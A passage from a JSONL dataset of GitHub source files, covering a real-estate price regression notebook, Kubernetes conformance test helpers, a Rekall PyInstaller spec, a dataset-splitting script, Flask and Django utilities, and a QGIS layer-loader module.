PRICE'])\nplt.show()\n\n\n# In[775]:\n\n\n# we can see that the sales price is highly skewed, decided to remove price which is larger than 2 * 10^9\ndf = df[df['SALE PRICE']<2*10**9]\ndf.shape\n\n\n# In[776]:\n\n\n# Plot the distribution of SALE PRICE\nplt.boxplot(df['SALE PRICE'])\nplt.show()\n\n\n# In[777]:\n\n\npercent_75 = np.percentile(df['SALE PRICE'], 75)\nnp.percentile(df['SALE PRICE'], 1)\ndf = df[df['SALE PRICE'] < percent_75]\nplt.hist(df['SALE PRICE'], bins= 100)\nplt.show()\n\n\n# In[778]:\n\n\n# Remove the records with too low sales price\ndf = df[df['SALE PRICE']>100000]\nplt.hist(df['SALE PRICE'], bins= 50)\nplt.show()\n\n\n# ### Zip Code & Square Feet\n\n# In[779]:\n\n\n# remove data records with zip code not in new york(less than 10000)\ndf= df[df['ZIP CODE']>10000]\ndf= df[df['GROSS SQUARE FEET']>0]\ndf= df[df['LAND SQUARE FEET']>0]\n\n\n# In[780]:\n\n\ndf['ZIP CODE'].describe()\n\n\n# In[781]:\n\n\ndf.shape\n\n\n# In[785]:\n\n\ndf['ZIP CODE']=df['ZIP CODE'].astype('object')\ndf['BOROUGH']=df['BOROUGH'].astype('object')\n\n\n# ## Data Overview\n\n# In[786]:\n\n\ndf.shape\n\n\n# In[787]:\n\n\ndf.info()\n\n\n# In[788]:\n\n\ndf.describe()\n\n\n# # **Exploratory Data Analysis**\n\n# ## Describe Numeric Data\n\n# In[789]:\n\n\n## Explore numerical features\ndf.describe(include=[np.number])\n\n\n# In[790]:\n\n\ncol=['BOROUGH','ZIP CODE','BLOCK','LOT','ZIP CODE','LAND SQUARE FEET','GROSS SQUARE FEET','YEAR BUILT','TAX CLASS AT TIME OF SALE','SALE PRICE']\ndf[col]\n\n\n# ## Describe Categorical Data\n\n# In[791]:\n\n\ndf_categorical.describe()\n\n\n# In[792]:\n\n\ndf['BOROUGH'].unique()\n\n\n# In[793]:\n\n\ndf['BOROUGH'].hist()\n\n\n# In[794]:\n\n\ndf['TAX CLASS AT PRESENT'].unique()\n\n\n# In[795]:\n\n\ndf['TAX CLASS AT PRESENT'].hist()\n\n\n# In[796]:\n\n\n# TAX CLASS AT PRESENT\npivot1 = df.groupby(\"TAX CLASS AT PRESENT\")['SALE PRICE'].median()\npivot1\n\n\n# In[797]:\n\n\npivot1.plot(kind='bar', color='b')\n\n\n# In[798]:\n\n\n# TAX CLASS AT TIME OF SALE\ndf['TAX CLASS AT TIME OF SALE'].unique()\n\n\n# In[799]:\n\n\npivot2 = df.groupby('TAX CLASS AT TIME OF SALE')['SALE PRICE'].median()\npivot2\n\n\n# In[800]:\n\n\npivot2.plot(kind='bar', color='r')\n\n\n# In[801]:\n\n\n#BOROUGH\ndf['BOROUGH'].unique()\n\n\n# In[802]:\n\n\npivot3_1 = df.groupby('BOROUGH')['SALE PRICE'].median()\npivot3_1\n\n\n# In[803]:\n\n\npivot3_1.plot(kind='bar', color='g')\n\n\n# In[804]:\n\n\npivot3_2=df.groupby('ZIP CODE')['SALE PRICE'].median()\npivot3_2\n\n\n# In[805]:\n\n\npivot3_2.plot(kind='area',color='green')\n\n\n# In[806]:\n\n\n#BUILDING CLASS CATEGORY\nprint(df['BUILDING CLASS CATEGORY'].nunique())\n\n\n# In[807]:\n\n\npivot4 = df.groupby('BUILDING CLASS CATEGORY')['SALE PRICE'].median()\npivot4\n\n\n# In[808]:\n\n\nplt.figure(figsize=(6,6))\npivot4.plot(kind='bar', color='Green')\n\n\n# # **Optimized Model Preparation**\n\n# ## One-Hot Encoding\n\n# In[809]:\n\n\n#Features to be one-hot encoded\none_hot_features = ['BOROUGH', 'ZIP CODE','BUILDING CLASS CATEGORY','TAX CLASS AT PRESENT','TAX CLASS AT TIME OF SALE']\n#Converting categorical variables into indicator variables\none_hot_encoded = pd.get_dummies(df[one_hot_features])\none_hot_encoded.info(verbose=True, memory_usage=True, null_counts=True)\n\n\n# In[810]:\n\n\n# Replacing categorical columns with dummies\nfdf = df.drop(one_hot_features,axis=1)\nfdf = pd.concat([fdf, one_hot_encoded] ,axis=1)\nfdf.info()\n\n\n# ## Correlation Matrix\n\n# In[811]:\n\n\ncorrelation_matrix_numerical=df[col].corr(method='pearson')\ncorrelation_matrix_numerical\n\n\n# In[665]:\n\n\ncorrelation_matrix_categorical=fdf.corr(method='pearson')\ncorrelation_matrix_categorical\n\n\n# ## Numeric Features Heatmap\n\n# In[812]:\n\n\nplt.subplots(figsize = (12,10))\nsns.heatmap(correlation_matrix_numerical)\n\n\n# # **Optimized Models**\n\n# ## Data Preview\n\n# In[814]:\n\n\ndf=fdf\n\n\n# In[815]:\n\n\ndf.shape\n\n\n# In[816]:\n\n\ndf.info()\n\n\n# ## Create Dataset\n\n# In[817]:\n\n\ndf_temp = df.sample(n=int(df.shape[0]*0.1), random_state=1)\n# Create dataset\nX, y = df_temp.drop(['SALE PRICE', 'SALE DATE'], axis=1), df_temp['SALE PRICE']\n\n\n# ## Random Forest\n\n# In[818]:\n\n\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import make_scorer\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import cross_validate\n\n\n# In[819]:\n\n\n#define MAPE function to calculate mean absolute percentage error\nimport numpy as np\ndef MAPE(true, pred):\n diff = np.abs(np.array(true) - np.array(pred))\n return np.mean(diff / true)\n\n\n# In[820]:\n\n\nrf_regressor = RandomForestRegressor(min_samples_leaf=10)\nscores_rf = cross_validate(rf_regressor, X, y, cv=10,\n scoring=make_scorer(MAPE),\n return_train_score=True)\n\n\n# In[821]:\n\n\nprint('The mape result for random forest is {}'.format(np.min(scores_rf['test_score'])))\n\n\n# ## Adaboost\n\n# In[675]:\n\n\nfrom sklearn.ensemble import AdaBoostRegressor\n\n\n# In[676]:\n\n\nregr = AdaBoostRegressor(random_state=0, n_estimators=500)\nscores_adaboost = cross_validate(regr, X, y, cv=5,\n scoring=make_scorer(MAPE),\n return_train_score=True)\n\n\n# In[677]:\n\n\nprint('The best score for Adaboost is {}'.format(np.min(scores_adaboost['test_score'])))\n\n\n# ## Lightgbm\n\n# In[678]:\n\n\nimport lightgbm as lgb\nfrom lightgbm import LGBMRegressor\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\ngbm = lgb.LGBMRegressor(num_leaves=1000,\n learning_rate=0.01,\n n_estimators=300)\ngbm.fit(X_train, y_train,\n eval_set=[(X_test, y_test)],\n eval_metric='l1',\n early_stopping_rounds=100)\n\nprint('Starting predicting...')\n# predict\ny_pred = gbm.predict(X_test, num_iteration=gbm.best_iteration_)\n# eval\nprint('The mape of prediction is:', MAPE(y_test, y_pred))\n\n\n# ## XGBoost\n\n# ### Build MAE & MAPE Functions\n\n# In[679]:\n\n\nimport numpy as np\ndef xgboost_MAE(pred, dtrain: xgb.DMatrix):\n true = dtrain.get_label()\n diff = np.abs(np.array(true) - np.array(pred))\n return 'mae', float(np.mean(diff))\n\ndef xgboost__MAPE(pred, dtrain: xgb.DMatrix):\n true = dtrain.get_label()\n diff = np.abs(np.array(true) - np.array(pred))\n return 'mape', float(np.exp(np.mean(diff))-1)\n \n\n\n# ### Calculate MAE of Original Price\n\n# In[849]:\n\n\nimport xgboost as xgb\nfrom sklearn.metrics import mean_absolute_error\nclf = xgb.XGBRegressor(learning_rate=0.04,\n n_estimators=600,\n max_depth=5, colsample_bylevel=0.9)\n\n\n# In[850]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y , test_size=0.2, random_state=42)\nclf.fit(X_train, y_train,\n eval_set=[(X_train, y_train), (X_test, y_test)],\n eval_metric=xgboost_MAE,\n verbose=True )\n\nprint('Starting predicting...')\n# predict\ny_pred = clf.predict(X_test)\n# eval\nmae = mean_absolute_error(y_test, y_pred)\nprint('The MAE of predictions on original sales price are:',mae)\n\n\n# ### Calculate MAE on Log Price ( MAPE on Original Price)\n\n# In[851]:\n\n\nX_train, X_test, ylg_train, ylg_test = train_test_split(X, np.log(y), test_size=0.2, random_state=42)\nclf.fit(X_train, ylg_train,\n eval_set=[(X_train, ylg_train), (X_test, ylg_test)],\n eval_metric=xgboost__MAPE,\n verbose=True )\n\nprint('Starting predicting...')\n# predict\nylg_pred = clf.predict(X_test)\n# eval\nmae_logpx =mean_absolute_error(ylg_test, ylg_pred)\nprint('The mae of log prices are:',mae_logpx)\n\n\n# # **Conclusion**\n\n# We tried four models on the real estate sales price dataset. After being cleaned, the dataset contains more than 40k pieces of data with around 300 features. Measures taken in order to gain better performance include adjusting paramters, passing in customized evaluation functions, computing log on original price etc. \n# \n# The best performance acheived by our models is around MAE of 70k dollars, MAPE of 0.25. \n","repo_name":"vickeywangvw/Real-Estate-Price-Prediction","sub_path":"Real Estate Price Prediction (Optimized).py","file_name":"Real Estate Price Prediction (Optimized).py","file_ext":"py","file_size_in_byte":10749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42894692693","text":"from azure.core.exceptions import HttpResponseError\nfrom msrest import Serializer\nimport pytest\nimport time\nimport json\n\nfrom kubernetes import client\nfrom common.kubernetes_crd_utility import watch_crd_instance\nfrom common.kubernetes_pod_utility import (\n watch_pod_status,\n get_pod_logs,\n get_pod_logs_since_seconds,\n)\nfrom common.kubernetes_configmap_utility import get_namespaced_configmap\nfrom common.kubernetes_configuration_utility import show_kubernetes_configuration\nfrom common.kubernetes_secret_utility import watch_kubernetes_secret\nfrom common.kubernetes_namespace_utility import watch_namespace\nfrom common.results_utility import append_result_output\n\n\n# This function checks the status of the namespaces of the kubernetes cluster. The namespaces to be monitored are passed in as a list.\ndef check_namespace_status(outfile=None, namespace_list=None, timeout=300):\n namespace_dict = {}\n for namespace in namespace_list:\n namespace_dict[namespace] = 0\n append_result_output(\"Namespace dict: {}\\n\".format(namespace_dict), outfile)\n print(\"Generated the namespace dictionary.\")\n\n # THe callback function to check the namespace status\n def namespace_event_callback(event):\n try:\n append_result_output(\"{}\\n\".format(event), outfile)\n namespace_name = event[\"raw_object\"].get(\"metadata\").get(\"name\")\n namespace_status = event[\"raw_object\"].get(\"status\")\n if not namespace_status:\n return False\n if namespace_status.get(\"phase\") == \"Active\":\n namespace_dict[namespace_name] = 1\n if all(ele == 1 for ele in list(namespace_dict.values())):\n return True\n return False\n except Exception as e:\n pytest.fail(\"Error occured while processing the namespace event: \" + str(e))\n\n # Checking the namespace status\n api_instance = client.CoreV1Api()\n watch_namespace(api_instance, timeout, namespace_event_callback)\n\n\n# This function checks the status of pods in a given namespace. The pods to be monitored are identified using the pod label list parameter.\ndef check_kubernetes_pods_status(\n pod_namespace, outfile=None, pod_label_list=None, timeout=300\n):\n pod_label_dict = {}\n if (\n pod_label_list\n ): # This parameter is a list of label values to identify the pods that we want to monitor in the given namespace\n for pod_label in pod_label_list:\n pod_label_dict[pod_label] = 0\n append_result_output(\"Pod label dict: {}\\n\".format(pod_label_dict), outfile)\n print(\"Generated the pods dictionary.\")\n\n # The callback function to check if the pod is in running state\n def pod_event_callback(event):\n try:\n append_result_output(\"{}\\n\".format(event), outfile)\n pod_status = event[\"raw_object\"].get(\"status\")\n pod_metadata = event[\"raw_object\"].get(\"metadata\")\n pod_metadata_labels = pod_metadata.get(\"labels\")\n if not pod_metadata_labels:\n return False\n\n pod_metadata_label_values = (\n pod_metadata_labels.values()\n ) # It contains the list of all label values for the pod whose event was called.\n current_label_value = None # This label value will be common in pod event and label list provided and will be monitored\n for label_value in pod_metadata_label_values:\n if label_value in pod_label_dict:\n current_label_value = label_value\n if not current_label_value:\n return False\n\n if pod_status.get(\"containerStatuses\"):\n for container in pod_status.get(\"containerStatuses\"):\n if container.get(\"restartCount\") > 0:\n pytest.fail(\n \"The pod {} was restarted. Please see the pod logs for more info.\".format(\n container.get(\"name\")\n )\n )\n if not container.get(\"state\").get(\"running\"):\n pod_label_dict[current_label_value] = 0\n return False\n else:\n pod_label_dict[current_label_value] = 1\n if all(ele == 1 for ele in list(pod_label_dict.values())):\n return True\n return False\n except Exception as e:\n pytest.fail(\"Error occured while processing the pod event: \" + str(e))\n\n # Checking status of all pods\n if pod_label_dict:\n api_instance = client.CoreV1Api()\n watch_pod_status(api_instance, pod_namespace, timeout, pod_event_callback)\n\n\n# Function to check if the crd instance status has been updated with the status fields mentioned in the 'status_list' parameter\ndef check_kubernetes_crd_status(\n crd_group,\n crd_version,\n crd_namespace,\n crd_plural,\n crd_name,\n status_dict={},\n outfile=None,\n timeout=300,\n):\n # The callback function to check if the crd event received has been updated with the status fields\n def crd_event_callback(event):\n try:\n append_result_output(\"{}\\n\".format(event), outfile)\n crd_status = event[\"raw_object\"].get(\"status\")\n if not crd_status:\n return False\n for status_field in status_dict:\n if not crd_status.get(status_field):\n return False\n if crd_status.get(status_field) != status_dict.get(status_field):\n pytest.fail(\n \"The CRD instance status has been updated with incorrect value for '{}' field.\".format(\n status_field\n )\n )\n return True\n except Exception as e:\n pytest.fail(\"Error occured while processing crd event: \" + str(e))\n\n # Checking if CRD instance has been updated with status fields\n api_instance = client.CustomObjectsApi()\n watch_crd_instance(\n api_instance,\n crd_group,\n crd_version,\n crd_namespace,\n crd_plural,\n crd_name,\n timeout,\n crd_event_callback,\n )\n\n\n# Function to monitor the pod logs. It will ensure that are logs passed in the 'log_list' parameter are present in the container logs.\ndef check_kubernetes_pod_logs(\n pod_namespace,\n pod_name,\n container_name,\n logs_list=None,\n error_logs_list=None,\n outfile=None,\n timeout_seconds=300,\n):\n logs_dict = {}\n for log in logs_list:\n logs_dict[log] = 0\n print(\"Generated the logs dictionary.\")\n\n # The callback function to examine the pod log\n def pod_log_check(logs):\n try:\n for error_log in error_logs_list:\n if error_log in logs:\n pytest.fail(\"Error log found: \" + logs)\n for log in logs_dict:\n if log in logs:\n logs_dict[log] = 1\n if all(ele == 1 for ele in list(logs_dict.values())):\n return True\n return False\n except Exception as e:\n pytest.fail(\"Error occured while processing pod log event: \" + str(e))\n\n # Checking the pod logs\n api_instance = client.CoreV1Api()\n pod_logs = get_pod_logs(api_instance, pod_namespace, pod_name, container_name)\n if not pod_log_check(pod_logs):\n timeout = time.time() + timeout_seconds\n while True:\n time.sleep(60)\n pod_logs_since_interval = get_pod_logs_since_seconds(\n api_instance, pod_namespace, pod_name, container_name, 90\n )\n if pod_log_check(pod_logs_since_interval):\n break\n if time.time() > timeout:\n pytest.fail(\"The watch on the pod logs has timed out.\")\n\n\n# Function to check the compliance state of the kubernetes configuration\ndef check_kubernetes_configuration_state(\n kc_client,\n resource_group,\n cluster_rp,\n cluster_type,\n cluster_name,\n configuration_name,\n outfile=None,\n timeout_seconds=300,\n):\n timeout = time.time() + timeout_seconds\n while True:\n get_kc_response = show_kubernetes_configuration(\n kc_client,\n resource_group,\n cluster_rp,\n cluster_type,\n cluster_name,\n configuration_name,\n )\n append_result_output('GET config response: {}\\n'.format(Serializer().serialize_data(get_kc_response, 'FluxConfiguration', keep_readonly=True)), outfile)\n provisioning_state = get_kc_response.provisioning_state\n compliance_state = get_kc_response.compliance_state or \"Unknown\"\n if provisioning_state == \"Succeeded\" and compliance_state == \"Compliant\":\n break\n if provisioning_state == \"Failed\" or provisioning_state == \"Cancelled\":\n error_message = \"ERROR: The kubernetes configuration creation finished with terminal provisioning state {}. \".format(\n provisioning_state\n )\n append_result_output(error_message, outfile)\n pytest.fail(error_message)\n if time.time() > timeout:\n error_message = \"ERROR: Timeout. The kubernetes configuration is in {} provisioning state and {} compliance state.\".format(\n provisioning_state, compliance_state\n )\n append_result_output(error_message, outfile)\n pytest.fail(error_message)\n time.sleep(10)\n\n\ndef check_kubernetes_configuration_delete_state(\n kc_client,\n resource_group,\n cluster_rp,\n cluster_type,\n cluster_name,\n configuration_name,\n outfile=None,\n timeout_seconds=300,\n):\n timeout = time.time() + timeout_seconds\n while True:\n try:\n get_kc_response = kc_client.get(\n resource_group,\n cluster_rp,\n cluster_type,\n cluster_name,\n configuration_name,\n )\n provisioning_state = get_kc_response.provisioning_state\n append_result_output(\n \"Kubernetes Configuration still exists with Provisioning State: {}\\n\".format(\n provisioning_state\n ),\n outfile,\n )\n except HttpResponseError as e:\n if e.status_code == 404:\n append_result_output(\n \"Kubernetes Configuration {} successfully deleted\\n\".format(\n configuration_name\n ),\n outfile,\n )\n break\n if time.time() > timeout:\n pytest.fail(\n \"ERROR: Timeout. The kubernetes configuration is in {} provisioning state.\".format(\n provisioning_state\n )\n )\n time.sleep(10)\n\n\n# Function to monitor the kubernetes secret. It will determine if the secret has been successfully created.\ndef check_kubernetes_secret(secret_namespace, secret_name, timeout=300):\n # The callback function to check if the secret event received has secret data\n def secret_event_callback(event):\n try:\n secret_data = event[\"raw_object\"].get(\"data\")\n if not secret_data:\n return False\n return True\n except Exception as e:\n pytest.fail(\"Error occured while processing secret event: \" + str(e))\n\n # Checking the kubernetes secret\n api_instance = client.CoreV1Api()\n watch_kubernetes_secret(\n api_instance, secret_namespace, secret_name, timeout, secret_event_callback\n )\n\n\ndef get_azure_arc_agent_version(api_instance, namespace, configmap_name):\n configmap = get_namespaced_configmap(api_instance, namespace, configmap_name)\n azure_arc_agent_version = configmap.data.get(\"AZURE_ARC_AGENT_VERSION\")\n if not azure_arc_agent_version:\n pytest.fail(\n \"The azure arc configmap does not contain the azure arc agent version.\"\n )\n return azure_arc_agent_version\n","repo_name":"isabella232/microsoft-flux-conformance","sub_path":"src/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":12113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9901417767","text":"# -*- mode: python -*-\nimport os\nimport sys\nimport distorm3\n\na = Analysis(\n ['tools/installers/rekal.py'],\n hiddenimports=[],\n hookspath=None,\n runtime_hooks=None)\n\npyz = PYZ(a.pure)\n\nexe = EXE(\n pyz,\n a.scripts,\n exclude_binaries=True,\n name='rekal',\n debug=False,\n strip=True,\n upx=True,\n console=True)\n\n# The yara installer is dumb and puts the lib in dumb places. I have given up\n# trying to guess where it'll end up after we pip install it.\nLIBYARA = None\nfor dirpath, _, files in os.walk(sys.prefix):\n if \"yara.so\" in files:\n LIBYARA = os.path.join(dirpath, \"yara.so\")\n break\n\nif LIBYARA is None:\n raise RuntimeError(\"Could not find yara.so.\")\n\n\nLIBDISTORM3 = os.path.join(distorm3.__path__[0], \"libdistorm3.so\")\n\ncoll = COLLECT(\n exe,\n a.binaries + [\n (\"libdistorm3.so\", LIBDISTORM3, \"BINARY\"),\n (\"lib/yara.so\", LIBYARA, \"BINARY\"),\n ],\n a.zipfiles,\n a.datas,\n strip=None,\n upx=True,\n name='rekal')\n","repo_name":"Labs22/BlackServerOS","sub_path":"Digital Forensics/rekall-1.6.0/rekall-1.6.0/tools/installers/darwin.spec","file_name":"darwin.spec","file_ext":"spec","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"5"} +{"seq_id":"27456546065","text":"from glob import glob\r\nimport os\r\nimport random\r\nimport numpy as np\r\n\r\nrandom.seed(45)\r\n\r\nDATASET = 'Patch_SVM_32_60'\r\nPATH_DICT = {}\r\nPATH_DICT_ = {}\r\n\r\n\r\ndataset_groups = [os.path.split(group)[-1] for group in glob(DATASET+'/*')]\r\nfor grp in dataset_groups:\r\n\tPATH_DICT[grp] = []\r\n#path_list = [path for path in ]\r\n#print(PATH_DICT)\r\nfor path in glob(DATASET+'/*/*'):\r\n\tfor grp in dataset_groups:\r\n\t\tif grp in path:\r\n\t\t\tPATH_DICT[grp].append(path)\r\n\t\t\r\n\r\nfor div in [\"training\", \"test\", \"vallidation\"]:\r\n\tPATH_DICT_[div] = {}\r\n\tfor grp in dataset_groups:\r\n\t\tgrp_lst = PATH_DICT[grp]\r\n\t\trandom.shuffle(grp_lst)\r\n\r\n\t\ttrain_no = int(len(grp_lst)*0.7)\r\n\t\ttest_no = int(len(grp_lst)*0.9)\r\n\t\t#val_no = int(len(grp_lst)*0.1)\r\n\t\tif div == \"training\":\r\n\t\t\tPATH_DICT_[div][grp] = grp_lst[:train_no]\r\n\t\telif div == \"test\":\r\n\t\t\tPATH_DICT_[div][grp] = grp_lst[train_no:test_no]\r\n\t\telif div == \"vallidation\":\r\n\t\t\tPATH_DICT_[div][grp] = grp_lst[test_no:]\r\n\r\n\r\nos.system(\"mkdir training test vallidation\")\r\n\r\n\r\nfor div in [\"training\", \"test\", \"vallidation\"]:\r\n\tfor grp in PATH_DICT:\r\n\t\tp = os.path.join(div,grp)\r\n\t\tos.system(\"mkdir \"+p)\r\n\r\nfor split in PATH_DICT_:\r\n\tfor grp in PATH_DICT_[split]:\r\n\t\tp = os.path.join(split,grp)\r\n\t\tfor img in PATH_DICT_[split][grp]:\r\n\t\t\tos.system('cp '+img+' '+p)\r\n","repo_name":"Beeseey/Thesis_A_DEEP_LEARNING_BASED_INTEGRATED_RETRIEVAL_SYSTEM-FOR_MEDICAL_IMAGES","sub_path":"PBIR/data_split.py","file_name":"data_split.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"14079273002","text":"#arquivo_txt.py\n\nimport sys\n\n#modo de abertura de arquivos:\n#'r' = read only (modo leitura)\n#'w' = write (modo escrita)\n#'a' = append(modo anexar)\n\nlista=[]\n\ndef entrada():\n fruta=input('Nome da fruta para adicionar:')\n lista.append(fruta)\n print(fruta + 'adicionar na lista')\n\ndef mostrar():\n print('lista=',lista)\n\ndef gravar():\n arquivo = open('frutas.txt','w') #modo escrita\n for fruta in lista:\n arquivo.write(fruta + '\\n')\n\n arquivo.close()\n print('Dados gravados com sucesso')\n\ndef ler():\n pass\n\ndef anexar():\n pass\n\ndef menu():\n print('\\n\\n######################')\n print('## Controle de listas ##')\n print('1 = entrada de dados')\n print('2 = mostrar dados')\n print('3 = gravar dados')\n print('4 = ler dados')\n print('5 = anexar dados')\n opcao=int(input('Qual opção?'))\n\n if(opcao==1):\n entrada()\n elif(opcao==2):\n mostrar()\n elif(opcao==3):\n gravar()\n elif(opcao==4):\n ler()\n elif(opcao==5):\n anexar()\n else:\n print('Opção inválida!')\n\n\n\nif(__name__=='__main__'):\n while True: #loop infinito\n menu()\n \n","repo_name":"GusSimoes/python","sub_path":"arquivo_txt.py","file_name":"arquivo_txt.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1534328883","text":"__author__ = 'Chris Bandy'\n\nfrom datetime import datetime, timedelta\nfrom functools import wraps\nfrom flask import g, url_for, flash, abort, request, redirect\n\nTIMEDELTA_UNITS = (\n ('year', 3600 * 24 * 365),\n ('month', 3600 * 24 * 30),\n ('week', 3600 * 24 * 7),\n ('day', 3600 * 24),\n ('hour', 3600),\n ('minute', 60),\n ('second', 1)\n )\n\n\ndef requires_login(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if g.user is None:\n flash(u'You need to be signed in for this page.')\n return redirect(url_for('general.login', next=request.path))\n return f(*args, **kwargs)\n\n return decorated_function\n\n\ndef requires_admin(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if not g.user.is_admin:\n abort(401)\n return f(*args, **kwargs)\n\n return requires_login(decorated_function)\n\n\ndef format_datetime(dt):\n return dt.strftime('%Y-%m-%d @ %H:%M')\n\n\ndef format_timedelta(delta, granularity='second', threshold=.85):\n if isinstance(delta, datetime):\n delta = datetime.utcnow() - delta\n if isinstance(delta, timedelta):\n seconds = int((delta.days * 86400) + delta.seconds)\n else:\n seconds = delta\n\n for unit, secs_per_unit in TIMEDELTA_UNITS:\n value = abs(seconds) / secs_per_unit\n if value >= threshold or unit == granularity:\n if unit == granularity and value > 0:\n value = max(1, value)\n value = int(round(value))\n rv = u'%s %s' % (value, unit)\n if value != 1:\n rv += u's'\n return rv\n return u''\n\ndef enum(**enums):\n return type('Enum', (object,), enums)","repo_name":"bandycj/SwaRoute","sub_path":"swa_route/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"37427951047","text":"from rest_framework import serializers\n\nfrom airplanes.models import AirplaneType, Airplane\n\n\nclass AirplaneTypeSerializer(serializers.ModelSerializer):\n class Meta:\n model = AirplaneType\n fields = (\"id\", \"name\")\n\n\nclass AirplaneSerializer(serializers.ModelSerializer):\n class Meta:\n model = Airplane\n fields = (\"id\", \"name\", \"rows\", \"seats_in_row\", \"airplane_type\")\n\n\nclass AirplaneDetailSerializer(AirplaneSerializer):\n airplane_type = AirplaneTypeSerializer(many=False, read_only=True)\n\n class Meta:\n model = Airplane\n fields = (\n \"id\",\n \"name\",\n \"image\",\n \"rows\",\n \"seats_in_row\",\n \"airplane_type\",\n \"capacity\",\n )\n\n\nclass AirplaneListSerializer(AirplaneSerializer):\n airplane_type = serializers.SlugRelatedField(\n many=False, read_only=True, slug_field=\"name\"\n )\n\n\nclass AirplaneImageSerializer(serializers.ModelSerializer):\n class Meta:\n model = Airplane\n fields = (\"id\", \"image\")\n","repo_name":"Paul-Starodub/Airport-API-Service","sub_path":"airplanes/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34511337284","text":"from .iml_auth_loader import IMLProjectScopedAuthLoader, AuthenticationError\nfrom ...layer import queue\nfrom ...loader.layer_loader import (\n TileLayerLoader,\n parse_exception_obj,\n ChainInterrupt,\n InitUploadLayerController,\n UploadLayerController,\n LiveTileLayerLoader,\n LoadLayerController,\n EditSyncController,\n)\nfrom ...network.net_handler import NetworkResponse, NetworkError\nfrom ...common.signal import make_fun_args\n\n\nclass IMLAuthExtension:\n MAX_RETRY_COUNT = 1\n\n def __init__(self, network, *a, **kw):\n # setup retry with reauth\n self._reset_retry_cnt()\n self.con_auth = IMLProjectScopedAuthLoader(network)\n self.con_auth.signal.results.connect(make_fun_args(self._after_retry_with_auth))\n self.con_auth.signal.error.connect(self._handle_auth_error)\n\n def _handle_auth_error(self, err):\n chain_err = parse_exception_obj(err)\n if isinstance(chain_err, ChainInterrupt):\n e, idx = chain_err.args[0:2]\n else:\n e = chain_err\n self._release() # release active dispatch\n self.signal.error.emit(AuthenticationError(e))\n\n def _handle_error(self, err):\n\n chain_err = parse_exception_obj(err)\n if isinstance(chain_err, ChainInterrupt):\n e, idx = chain_err.args[0:2]\n else:\n e = chain_err\n if isinstance(e, NetworkError): # retry only when network error, not timeout\n response = e.get_response()\n status = response.get_status()\n reply = response.get_reply()\n if status in (401, 403):\n if self._retry_cnt < self.MAX_RETRY_COUNT:\n self._retry_with_auth(reply)\n return\n else:\n self._retry(reply)\n return\n # otherwise emit error\n self._release() # release active dispatch\n self.signal.error.emit(err)\n\n def _reset_retry_cnt(self):\n self._retry_cnt = 0\n\n def _retry_with_auth(self, reply):\n self._retry_cnt += 1\n # retried params\n self.params_queue.retry_params()\n # try to reauth, then continue run loop\n self.con_auth.start(self.get_conn_info())\n\n def _after_retry_with_auth(self, conn_info=None):\n self._run_loop()\n\n def _refresh_loader(self, network, loader: LoadLayerController):\n self._reset_retry_cnt()\n conn_info = network.apply_connected_conn_info(loader.get_conn_info())\n\n def _save_conn_info_to_layer(self, loader: LoadLayerController):\n loader.layer.update_conn_info(loader.get_conn_info())\n\n\nclass IMLTileLayerLoader(IMLAuthExtension, TileLayerLoader):\n def __init__(self, network, *a, **kw):\n TileLayerLoader.__init__(self, network, *a, **kw)\n IMLAuthExtension.__init__(self, network, *a, **kw)\n self.params_queue = queue.SimpleRetryQueue(key=\"tile_id\")\n self.network = network\n\n def _start(self, **kw):\n self._refresh_loader(self.network, self)\n super()._start(**kw)\n\n def post_render(self, *a, **kw):\n super().post_render(*a, **kw)\n self._save_conn_info_to_layer(self)\n\n\nclass IMLLiveTileLayerLoader(IMLTileLayerLoader, LiveTileLayerLoader):\n def __init__(self, network, *a, **kw):\n # LiveTileLayerLoader init is same as TileLayerLoader, thus redundant here\n IMLTileLayerLoader.__init__(self, network, *a, **kw)\n\n\nclass IMLLayerLoader(IMLAuthExtension, LoadLayerController):\n def __init__(self, network, *a, **kw):\n LoadLayerController.__init__(self, network, *a, **kw)\n IMLAuthExtension.__init__(self, network, *a, **kw)\n self.network = network\n\n def _start(self, **kw):\n self._refresh_loader(self.network, self)\n super()._start(**kw)\n\n def post_render(self, *a, **kw):\n super().post_render(*a, **kw)\n self._save_conn_info_to_layer(self)\n\n def _retry_with_auth(self, reply):\n # retried params\n keys = [\"limit\", \"handle\"]\n params = dict(zip(keys, NetworkResponse(reply).get_qt_property(keys)))\n self.params_queue.gen_retry_params(**params)\n # try to reauth, then continue run loop\n self.con_auth.start(self.get_conn_info())\n\n\nclass IMLInitUploadLayerController(InitUploadLayerController):\n CLS_PARAMS_QUEUE = queue.SimpleRetryQueue\n\n\nclass IMLUploadLayerController(IMLAuthExtension, UploadLayerController):\n def __init__(self, network, *a, **kw):\n UploadLayerController.__init__(self, network, *a, **kw)\n IMLAuthExtension.__init__(self, network, *a, **kw)\n\n def _retry_with_auth(self, reply):\n # retried params\n self.lst_added_feat.retry_params()\n # try to reauth, then continue run loop\n self.con_auth.start(self.get_conn_info())\n\n\nclass IMLEditSyncController(IMLAuthExtension, EditSyncController):\n CLS_PARAMS_QUEUE = queue.SimpleRetryQueue\n\n def __init__(self, network, *a, **kw):\n EditSyncController.__init__(self, network, *a, **kw)\n 